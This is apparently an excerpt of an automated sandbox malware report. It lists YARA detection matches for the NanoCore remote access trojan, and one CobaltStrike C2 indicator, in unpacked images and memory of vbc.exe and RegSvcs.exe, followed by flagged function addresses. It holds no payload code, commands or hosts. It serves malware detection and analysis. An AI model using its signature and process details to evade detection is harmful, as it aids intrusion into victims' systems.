Source: 9.2.RegSvcs.exe.478e8a4.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.478e8a4.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.4780000.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4780000.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR Matched rule: CobaltStrike_C2_Host_Indicator date = 2019-08-16, author = yara@s3c.za.net, description = Detects CobaltStrike C2 host artifacts
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00300610 6_2_00300610
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301979 6_2_00301979
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301060 6_2_00301060
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301E8E 6_2_00301E8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003009C8 6_2_003009C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00300236 6_2_00300236
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301E76 6_2_00301E76
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301C78 6_2_00301C78
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301E48 6_2_00301E48
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301EDB 6_2_00301EDB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00458418 6_2_00458418
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453AC8 6_2_00453AC8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045D6D8 6_2_0045D6D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454CF0 6_2_00454CF0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045DAF0 6_2_0045DAF0
Source: C:\Users\Public\vbc.exe Code function: 6_2_004560F8 6_2_004560F8
Source: C:\Users\Public\vbc.exe Code function: 6_2_004564B8 6_2_004564B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450100 6_2_00450100
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457B38 6_2_00457B38
Source: C:\Users\Public\vbc.exe Code function: 6_2_004573E0 6_2_004573E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455BAA 6_2_00455BAA
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B040 6_2_0045B040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B050 6_2_0045B050
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045DA58 6_2_0045DA58
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456860 6_2_00456860
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B470 6_2_0045B470
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455E08 6_2_00455E08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B221 6_2_0045B221
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B230 6_2_0045B230
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045CEC2 6_2_0045CEC2
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AAD0 6_2_0045AAD0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045C8D0 6_2_0045C8D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AAD8 6_2_0045AAD8
Source: C:\Users\Public\vbc.exe Code function: 6_2_004560E9 6_2_004560E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_004500F0 6_2_004500F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B480 6_2_0045B480
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A0A9 6_2_0045A0A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_004564A8 6_2_004564A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_004540B1 6_2_004540B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A0B8 6_2_0045A0B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045EB60 6_2_0045EB60
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453B6A 6_2_00453B6A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457330 6_2_00457330
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045E3C1 6_2_0045E3C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045E3C8 6_2_0045E3C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B5F9 6_2_0045B5F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455DF8 6_2_00455DF8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457F80 6_2_00457F80
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454DA8 6_2_00454DA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C80DD5 6_2_00C80DD5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B3020 9_2_003B3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B2418 9_2_003B2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B38C8 9_2_003B38C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B9D20 9_2_003B9D20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B9120 9_2_003B9120
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003BEA80 9_2_003BEA80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003BC3E0 9_2_003BC3E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003BB7E0 9_2_003BB7E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003BC4A7 9_2_003BC4A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B30E7 9_2_003B30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003B9DE7 9_2_003B9DE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003BA5C8 9_2_003BA5C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02388218 9_2_02388218
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02384FE0 9_2_02384FE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02385BE0 9_2_02385BE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02386488 9_2_02386488
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02388E18 9_2_02388E18
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02388EDF 9_2_02388EDF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_0238777B 9_2_0238777B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02385CA7 9_2_02385CA7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_0238912B 9_2_0238912B
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_00490ACE NtQuerySystemInformation, 6_2_00490ACE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00490A9D NtQuerySystemInformation, 6_2_00490A9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F114A NtQuerySystemInformation, 9_2_003F114A
